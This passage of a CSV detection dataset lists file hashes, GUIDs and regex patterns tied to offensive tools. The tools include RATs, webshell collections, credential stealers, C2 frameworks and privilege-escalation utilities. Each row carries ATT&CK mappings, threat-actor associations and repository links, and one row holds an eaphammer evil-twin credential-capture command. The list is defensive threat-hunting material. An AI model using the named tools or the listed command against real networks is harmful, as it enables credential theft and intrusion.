"*ea10050aaa6ca06ddceb1e7e47205bf8a59b4f01918dcd7e22cca7aad5613d13*",".{0,1000}ea10050aaa6ca06ddceb1e7e47205bf8a59b4f01918dcd7e22cca7aad5613d13.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","#filehash","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","42450" "*ea17314d15bea466526ba9ca154009f04f46da461899ac4533d00479317703b8*",".{0,1000}ea17314d15bea466526ba9ca154009f04f46da461899ac4533d00479317703b8.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","0","#filehash","N/A","10","3","245","37","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z","42452" "*ea1e3b04e30cb4192671bf6a15f42bbb9aab140b59ab0d4097bb36459def54eb*",".{0,1000}ea1e3b04e30cb4192671bf6a15f42bbb9aab140b59ab0d4097bb36459def54eb.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","42454" "*ea1f91ef5b0a9befefc831e9c1093cc202e214673b7fbbb1b737fab9f5326c53*",".{0,1000}ea1f91ef5b0a9befefc831e9c1093cc202e214673b7fbbb1b737fab9f5326c53.{0,1000}","offensive_tool_keyword","blackvision","Command line Remote Access tool (RAT) for Windows.","T1090 - T1095 - 
T1008","TA0011","N/A","N/A","Malware","https://github.com/quantumcore/blackvision","1","0","#filehash","N/A","10","1","14","10","2019-09-16T18:32:51Z","2019-07-04T17:32:35Z","42456" "*ea20980ea983bf6033a3c2e1a1e1b17a3915867e9e6ed44beae3bbae70bc5cd4*",".{0,1000}ea20980ea983bf6033a3c2e1a1e1b17a3915867e9e6ed44beae3bbae70bc5cd4.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42458" "*ea240f25e5b63c24148a4f4e4393fdb4a00a3a6c6e3038e395b533663762415f*",".{0,1000}ea240f25e5b63c24148a4f4e4393fdb4a00a3a6c6e3038e395b533663762415f.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","42459" "*ea256adf2c7038dbbfa75b30c41364c29b9b8680bfccea9ccd33d33c16e63066*",".{0,1000}ea256adf2c7038dbbfa75b30c41364c29b9b8680bfccea9ccd33d33c16e63066.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","42460" "*ea2cd6a3926a99ffb0053a14a21829b88d3f62cb5290bf471eb21930041bc974*",".{0,1000}ea2cd6a3926a99ffb0053a14a21829b88d3f62cb5290bf471eb21930041bc974.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 
- T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","42462" "*ea2eacb07d4b1fbe1d8db075a3c497746b8268894797b573c86451b5628f8f5c*",".{0,1000}ea2eacb07d4b1fbe1d8db075a3c497746b8268894797b573c86451b5628f8f5c.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","42463" "*ea3087204e3ed644308a0a96bbf319590a9b2701ac850bb63f2ba3dc4955f1fd*",".{0,1000}ea3087204e3ed644308a0a96bbf319590a9b2701ac850bb63f2ba3dc4955f1fd.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","42464" "*ea36b8a42cc8ef052c4b58d29bdd20c5fe95dd8a025f8ac4728046891ef281bc*",".{0,1000}ea36b8a42cc8ef052c4b58d29bdd20c5fe95dd8a025f8ac4728046891ef281bc.{0,1000}","offensive_tool_keyword","DeadPotato","DeadPotato is a windows privilege escalation utility from the Potato family of exploits leveraging the SeImpersonate right to obtain SYSTEM privileges","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","N/A","N/A","Privilege Escalation","https://github.com/lypd0/DeadPotato","1","0","#filehash","N/A","10","4","382","45","2024-08-17T06:08:29Z","2024-07-31T01:08:30Z","42467" 
"*ea3749e4487dc724a97d4794a19b2921814b57087aafc66176c434c9605fe939*",".{0,1000}ea3749e4487dc724a97d4794a19b2921814b57087aafc66176c434c9605fe939.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","42468" "*ea4813fb19c07cb9d7c111c4808fa3eee05e3bf62694bc2481e50465c8853fda*",".{0,1000}ea4813fb19c07cb9d7c111c4808fa3eee05e3bf62694bc2481e50465c8853fda.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. 
Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","42472" "*ea49111ee3bf716e9f4643f95b5df19fd8bd7376464b2795dcfc5e07ddda35eb*",".{0,1000}ea49111ee3bf716e9f4643f95b5df19fd8bd7376464b2795dcfc5e07ddda35eb.{0,1000}","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","0","#filehash","N/A","10","5","433","56","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z","42473" "*ea4f2fa909653aa2c186bd78bca337abdd3aa7dc7277a510c4d6ffc692284ee8*",".{0,1000}ea4f2fa909653aa2c186bd78bca337abdd3aa7dc7277a510c4d6ffc692284ee8.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","42474" "*ea552615337ba9becf9c1341f4ad2556b204dca25982c123b2cfd6e218192b49*",".{0,1000}ea552615337ba9becf9c1341f4ad2556b204dca25982c123b2cfd6e218192b49.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","#filehash","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","42476" 
"*ea5653d977893407bd10f7c727996a317c378b02422e7c6d8f44e8959ad8ceb4*",".{0,1000}ea5653d977893407bd10f7c727996a317c378b02422e7c6d8f44e8959ad8ceb4.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42477" "*ea5dff2a0ded86187908ea824cf142496825b8eecc469c4351cb1cb99a36a07f*",".{0,1000}ea5dff2a0ded86187908ea824cf142496825b8eecc469c4351cb1cb99a36a07f.{0,1000}","offensive_tool_keyword","PrivFu","manage user right without secpol.msc","T1059 - T1078","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","UserRightsUtil","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","42478" "*ea5f032c532c30628da6fc76f5a4ad6ca4057ac2322f625b12fc907beadfc545*",".{0,1000}ea5f032c532c30628da6fc76f5a4ad6ca4057ac2322f625b12fc907beadfc545.{0,1000}","offensive_tool_keyword","Moriarty","Moriarty is designed to enumerate missing KBs - detect various vulnerabilities and suggest potential exploits for Privilege Escalation in Windows environments.","T1068 - T1083","TA0004 - TA0007","N/A","N/A","Discovery","https://github.com/BC-SECURITY/Moriarty","1","0","#filehash","N/A","7","6","510","67","2024-08-07T15:06:31Z","2023-12-11T14:15:33Z","42479" "*ea66527a0ec811d05d7976438d50982fc3c2fd4ad86a6a089b154f7d49de0c0e*",".{0,1000}ea66527a0ec811d05d7976438d50982fc3c2fd4ad86a6a089b154f7d49de0c0e.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","42480" 
"*ea707d12f05cf7fe93ca743158ae20c91ee663c50bd738b776d1183d1c8c7db2*",".{0,1000}ea707d12f05cf7fe93ca743158ae20c91ee663c50bd738b776d1183d1c8c7db2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42482" "*ea743427978d01e07b5aa14268ccc59fde773633a70747659af1a80da4ed0e02*",".{0,1000}ea743427978d01e07b5aa14268ccc59fde773633a70747659af1a80da4ed0e02.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42483" "*ea757b0016ff6287429d657cc4197ad6cc0f2655ed21a3a9a86952a085d65be5*",".{0,1000}ea757b0016ff6287429d657cc4197ad6cc0f2655ed21a3a9a86952a085d65be5.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","42484" 
"*ea800cfa42f8cd671d1569457aaf73bcc73c8ea74c4294193a69fb2bb7e1af34*",".{0,1000}ea800cfa42f8cd671d1569457aaf73bcc73c8ea74c4294193a69fb2bb7e1af34.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","42487" "*ea8adcdf44d1dfe4f0e44d265967e1beb1ac6eaf7c0fae943a4baaf0b7d1bbdb*",".{0,1000}ea8adcdf44d1dfe4f0e44d265967e1beb1ac6eaf7c0fae943a4baaf0b7d1bbdb.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","42489" "*ea912ca7c74d76924cdf1e634164d723a6d7a48212ab03c0f343a0132754a41b*",".{0,1000}ea912ca7c74d76924cdf1e634164d723a6d7a48212ab03c0f343a0132754a41b.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","#filehash","N/A","10","","N/A","","","","42490" 
"*ea9258e9975b8925a739066221d996aef19b4ef4f4c91524f82e39d403f25579*",".{0,1000}ea9258e9975b8925a739066221d996aef19b4ef4f4c91524f82e39d403f25579.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","#filehash","N/A","10","","N/A","","","","42491" "*EA92F1E6-3F34-48F8-8B0A-F2BBC19220EF*",".{0,1000}EA92F1E6\-3F34\-48F8\-8B0A\-F2BBC19220EF.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","#GUIDproject","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","42493" "*ea96ffffce62cf41ea2478b40db5e9d23f850f983cd8dcd8b752baea0478c443*",".{0,1000}ea96ffffce62cf41ea2478b40db5e9d23f850f983cd8dcd8b752baea0478c443.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42494" "*ea9786bf97f56c75668dc7cc037a7d5661d413741ffce35073a0f2edae5d3066*",".{0,1000}ea9786bf97f56c75668dc7cc037a7d5661d413741ffce35073a0f2edae5d3066.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - 
TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","42495" "*ea99966d7bb4f887b68d5b318b01d5851e99438426b7b72c65b042a58f3e6ce1*",".{0,1000}ea99966d7bb4f887b68d5b318b01d5851e99438426b7b72c65b042a58f3e6ce1.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","42496" "*ea9f997ffb3dd610c9848af65ed980b348c06d8ee11b7fb670d6a789f8075c5a*",".{0,1000}ea9f997ffb3dd610c9848af65ed980b348c06d8ee11b7fb670d6a789f8075c5a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","42497" "*ea9fbd902ce3f9a49045a213f6f18d922e6460869f908a9798466fbccaa60484*",".{0,1000}ea9fbd902ce3f9a49045a213f6f18d922e6460869f908a9798466fbccaa60484.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","42498" "*eaa667b2ee62c5960b2a1ae23ec8edbdb89de0897960cf9f5117b721f519ae98*",".{0,1000}eaa667b2ee62c5960b2a1ae23ec8edbdb89de0897960cf9f5117b721f519ae98.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","42500" "*eaa6c3fcb9e722d690183ae349ac2ca935aa9bcd2942f6f103fd8eb842dc5168*",".{0,1000}eaa6c3fcb9e722d690183ae349ac2ca935aa9bcd2942f6f103fd8eb842dc5168.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","42501" "*eaabe990e3dfa97bc3ffdd9f7369553597fb1686dbd91e164560ee476e1d6e79*",".{0,1000}eaabe990e3dfa97bc3ffdd9f7369553597fb1686dbd91e164560ee476e1d6e79.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","42503" 
"*eaae77ff59bd46d07499b29eaefb4ba3f1d1e36fe3c99ab46bb1fd578113cbe5*",".{0,1000}eaae77ff59bd46d07499b29eaefb4ba3f1d1e36fe3c99ab46bb1fd578113cbe5.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","42504" "*eab9878a9916e998587cf5587e3ac5ce0e5509713b3afe6e64003e8c6962b565*",".{0,1000}eab9878a9916e998587cf5587e3ac5ce0e5509713b3afe6e64003e8c6962b565.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","0","#filehash","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","42506" "*eae0886d4156fbf4b7af942fc3e5569d7ef36147c025d06fe30a34b852b4dcfc*",".{0,1000}eae0886d4156fbf4b7af942fc3e5569d7ef36147c025d06fe30a34b852b4dcfc.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42510" "*eae0e50f0914e264a60f84dc2fef44c610d00125a38d70fa6f470fa45b12d1e9*",".{0,1000}eae0e50f0914e264a60f84dc2fef44c610d00125a38d70fa6f470fa45b12d1e9.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - 
TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","42511" "*eae10507ae68eb619503bf0ea16b0d7fd4a1eb5d817bde2746413fb27c1e5aa5*",".{0,1000}eae10507ae68eb619503bf0ea16b0d7fd4a1eb5d817bde2746413fb27c1e5aa5.{0,1000}","offensive_tool_keyword","ShellSync","exposing a server with suspicious scripts and executable from I-Am-Jakoby","T1059.003 - T1100 - T1027","TA0005 - TA0009 - TA0011 ","N/A","N/A","Data Exfiltration","https://github.com/I-Am-Jakoby/ShellSync","1","0","#filehash","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","42512" "*eae7c7548d28517d099afef1bc7664f098bfa3c533ee5a0cf763ab28480ebeeb*",".{0,1000}eae7c7548d28517d099afef1bc7664f098bfa3c533ee5a0cf763ab28480ebeeb.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","42513" "*eaf0b65b09feded70f455b4fff79bc1fd2009b927849ad4ba63228d79fc90d4e*",".{0,1000}eaf0b65b09feded70f455b4fff79bc1fd2009b927849ad4ba63228d79fc90d4e.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","42514" "*eaf13ef05abfd1faa71d5ce0aa0b19664bdc32d05dea7836ad6d9bc0b2ff1694*",".{0,1000}eaf13ef05abfd1faa71d5ce0aa0b19664bdc32d05dea7836ad6d9bc0b2ff1694.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - 
T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","42515" "*eaf50935fba5aec83bbdf8fdc1ee57284098b88503c25fab1581d4c2b5ddb41e*",".{0,1000}eaf50935fba5aec83bbdf8fdc1ee57284098b88503c25fab1581d4c2b5ddb41e.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","42516" "*eaf85e2ba4dd79f5ef5d8d18c5886dc8cde0e18e7341e6808baf3d9a5bafed7d*",".{0,1000}eaf85e2ba4dd79f5ef5d8d18c5886dc8cde0e18e7341e6808baf3d9a5bafed7d.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","42517" "*eaf950c4c33d4697237cd99ac67b9050fa2c4d90c748f5c6582872ca1b0b7ffc*",".{0,1000}eaf950c4c33d4697237cd99ac67b9050fa2c4d90c748f5c6582872ca1b0b7ffc.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","42518" "*eaphammer -i eth0 --channel 4 --auth wpa-eap --essid * --creds*",".{0,1000}eaphammer\s\-i\seth0\s\-\-channel\s4\s\-\-auth\swpa\-eap\s\-\-essid\s.{0,1000}\s\-\-creds.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - 
T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","42519" "*eaphammer*",".{0,1000}eaphammer.{0,1000}","offensive_tool_keyword","EAPHammer","EAPHammer is a toolkit for performing targeted evil twin attacks against WPA2-Enterprise networks. It is designed to be used in full scope wireless assessments and red team engagements. As such. focus is placed on providing an easy-to-use interface that can be leveraged to execute powerful wireless attacks with minimal manual configuration. To illustrate just how fast this tool is. our Quick Start section provides an example of how to execute a credential stealing evil twin attack against a WPA/2-EAP network in just commands","T1553 - T1560 - T1569 - T1590 - T1591","TA0002 - TA0007","N/A","N/A","Exploitation 